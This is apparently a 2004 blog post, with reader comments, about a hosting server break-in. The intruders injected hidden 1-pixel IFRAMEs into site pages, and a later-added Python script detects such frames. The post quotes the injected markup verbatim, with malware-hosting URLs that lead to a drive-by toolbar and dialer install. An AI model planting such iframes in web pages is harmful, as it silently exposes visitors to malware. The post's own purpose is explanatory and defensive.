Internet Explorer is the problem
Today, someone broke into the server on which my Norwegian weblog is hosted. All due to what my host admitted to being a stupid human error — they booted the machine on which the site resides with the wrong kernel (a vulnerable 2.4.18 kernel) and opened themselves up for a root exploit.
I blame Internet Explorer for this problem.
No. You didn’t miss anything: I blame Microsoft Internet Explorer for this problem.
Once more, with feeling: Internet Explorer is the problem.
You see, this particular breakin wasn’t done by the average scriptkiddie with a need to deface web sites with his “0wn3d” tag. The breakin was done by someone with an economic motive for breaking in.
On every index.html document on the server (and this being shared hosting, there were quite a few of these), the following code was inserted right after <body>:
<IFRAME
SRC="http://www.forced-action.com/?d=get"
WIDTH="1" HEIGHT="1"></IFRAME>
A friend of mine discovered this, because her computer crashed every time she went to my site, after some porn program had tried to install itself on her computer. If we look at the document referenced in the iframe, it contains:
<IFRAME
SRC="http://mikefox.ud-dial.biz/connect.cgi" WIDTH=0 BORDER=0
HEIGHT=0></IFRAME>
<iframe src="tool.html" width=1 height=1></iframe>
<IFRAME
SRC="http://ttvqt.selfbookmark.info/enter.cgi?id=1929" WIDTH=1
HEIGHT=1></IFRAME>
The middle document, tool.html, is the culprit here, as it points to http://install.xxxtoolbar.com/ist/scripts/prompt.php - a JavaScript that attempts to do a drive-by-install of a porn toolbar ActiveX control. The spyware in this case is known as ISTbar.Slotch. According to the info on Spybot Search & Destroy, it “Tries to install the FCI dialer on nearly every window it opens.”
So, as you see, the people who attempted the breakin on my host’s server had a clear economic incentive to break in and silently alter web pages. And they do know how to hide their tracks. The domains pointed to reside in Latvia, Panama, Russia and Canada, and I wouldn’t be too surprised if the whois information is as fake as a blow-up doll.
So, I blame Microsoft Internet Explorer for this problem: If Internet Explorer hadn’t made users such an easy target for scams, these scumbags wouldn’t have had the same incentive to break in and mass-alter web pages.
If this collection of organized criminals were unable to use a browser to hijack someone’s phone line and monitor their habits, the sites involved would never have been a target.
My Norwegian blog is entirely non-commercial, and I discovered the problem within a few hours, so I didn’t lose any money over this, just time and temperament. But, for a small-time Internet business, this could have been a lot worse. Being tainted with having “installed porn” on a user’s machine might drive customers away on a permanent basis and ruin your reputation.
And I repeat: None of this would have happened if Internet Explorer had been a safe, sandboxed browser to begin with. A web browser has no business whatsoever installing software. None, never!
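For site owners who want to check their own pages for the kind of injection described in the post (a 0- or 1-pixel IFRAME placed right after the body tag), the following is an added detection example, not code from the original post or from the host. The sample page, the placeholder host injected.example and the names find_hidden_iframes and own_hosts are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: a clean document carrying injected frames of the
# shape quoted in the post. injected.example is a placeholder host, not a
# value taken from the incident.
SAMPLE = """<html><body><IFRAME
SRC="http://injected.example/?d=get"
WIDTH="1" HEIGHT="1"></IFRAME>
<h1>My weblog</h1>
<iframe src="/widgets/calendar.html" width="300" height="200"></iframe>
<iframe src="tool.html" width=1 height=1></iframe>
</body></html>"""

def _tiny(value):
    """True when a width/height attribute is 0 or 1 pixel."""
    try:
        return int((value or "").strip().lower().rstrip("px")) <= 1
    except ValueError:  # missing, empty or percentage values
        return False

class HiddenFrameFinder(HTMLParser):
    def __init__(self, own_hosts=()):
        super().__init__()
        self.own_hosts = {h.lower() for h in own_hosts}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":  # HTMLParser lowercases tag and attribute names
            return
        a = dict(attrs)
        # A frame collapsed in either dimension is invisible to the visitor.
        if not (_tiny(a.get("width")) or _tiny(a.get("height"))):
            return
        src = a.get("src") or ""
        host = (urlparse(src).hostname or "").lower()
        external = bool(host) and host not in self.own_hosts
        line, _ = self.getpos()  # line on which the tag starts
        self.findings.append({"line": line, "src": src, "external": external})

def find_hidden_iframes(html, own_hosts=()):
    """Return one finding per invisible iframe in the given HTML text."""
    finder = HiddenFrameFinder(own_hosts)
    finder.feed(html)
    finder.close()
    return finder.findings
```

Run it over every index.html under the document root after a suspected compromise; findings with external set to True are the ones to compare against a known-good copy first.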
Comments
Comment from Jesse Ruderman on 2004-02-22 04:04
All three major Windows browsers allow a web page to install software with one click from the user:
IE: ActiveX
Firefox: XPI
Opera 7.23: Downloading a .exe file
Button names: Firefox has Install Now/Cancel, which is clear. Internet Explorer has Yes/No, which is common on Windows and too vague for a security dialog. Opera has Open/Save, which is downright deceptive — “Opening” something should never cause untrusted software to run on your computer unsandboxed.
Default button: Only Firefox gets this wrong and makes “Install Now” the default button.
Warning: Firefox’s warning is clear and in bold. Internet Explorer’s is vague and buried. Opera has no warning.
Distractions: Internet Explorer’s dialog makes a big deal of the fact that the code is signed, making it seem safer than it is and making it less likely that a user will see the warning.
I don’t think this is a good thing, but IMO you’re wrong in attacking Internet Explorer when other browsers are comparable.
Comment from Arve on 2004-02-22 04:08
Ok, let me clarify: The problem is drive-by-downloads.
Comment from Lasse on 2004-02-23 08:17
Well, if you ask me, the problem is rather users who don’t update their systems. I tested the link in mention on an un-trusted machine with a freshly updated OS (Win XP Home ed.) and IE, and nothing was installed.
Internet Explorer might be a very poorly made program - but all systems will have faults and flaws, and the user is responsible for keeping his or her system updated.
Comment from Asbjørn Ulsberg on 2004-02-23 11:34
I agree that Internet Explorer is a problem, but I won’t give it all the blame. The biggest problem is users. Users who don’t update their systems. This is, however, just a result of Microsoft’s poor security policy. With systems older than Windows 2000, it’s afaik impossible to get automatic updates. And in 2000, the automatic update isn’t installed out of the box.
Microsoft has made all their software too difficult to update, and much too easy to attack. They have had every pipe open by default, and are trying to close them one by one now. Needless to say; it’s too late.
If a good security policy with automatic updates were enforced from day one, you wouldn’t see these kinds of problems. People would get the updates without any fuss, and the pipes wouldn’t be open by default.
So, when push comes to shove, the problem isn’t Internet Explorer or the users of the browser, but Microsoft itself. If the company did everything right, there would still be problems, but they would be itsy bitsy compared to those we see today.
Comment from steven hopper on 2006-01-13 06:14
Right on track. Now how about something on anti-spyware companies who spoof trial users into buying their product? Including freeware ones who seem to devise ways to motivate users into making ‘donations’?
Comment from Arve on 2006-01-13 10:12
Steven, there is a permanent solution for that.